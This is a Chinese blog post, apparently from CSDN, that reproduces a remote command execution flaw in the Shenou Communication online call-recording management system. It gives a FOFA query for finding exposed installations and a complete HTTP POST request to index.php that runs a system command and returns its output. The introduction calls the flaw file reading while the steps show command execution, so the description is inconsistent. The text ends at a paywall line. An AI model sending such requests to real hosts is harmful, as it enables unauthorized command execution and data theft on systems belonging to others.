申瓯通信设备有限公司在线录音管理系统 -RCE-index.php

天官赐福万无禁忌

已于 2024-08-01 12:56:17 修改

阅读量506

点赞数 6

分类专栏：漏洞复现文章标签：开发语言

于 2024-07-31 18:42:01 首次发布

本文链接：https://blog.csdn.net/weixin_45790890/article/details/140828158

版权

漏洞简介

申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露。

漏洞复现

fofa:"title=在线录音管理系统"

发送以下数据包进行命令执行后可在响应正文中获取命令的执行结果！

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: yourip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id

最低0.47元/天解锁文章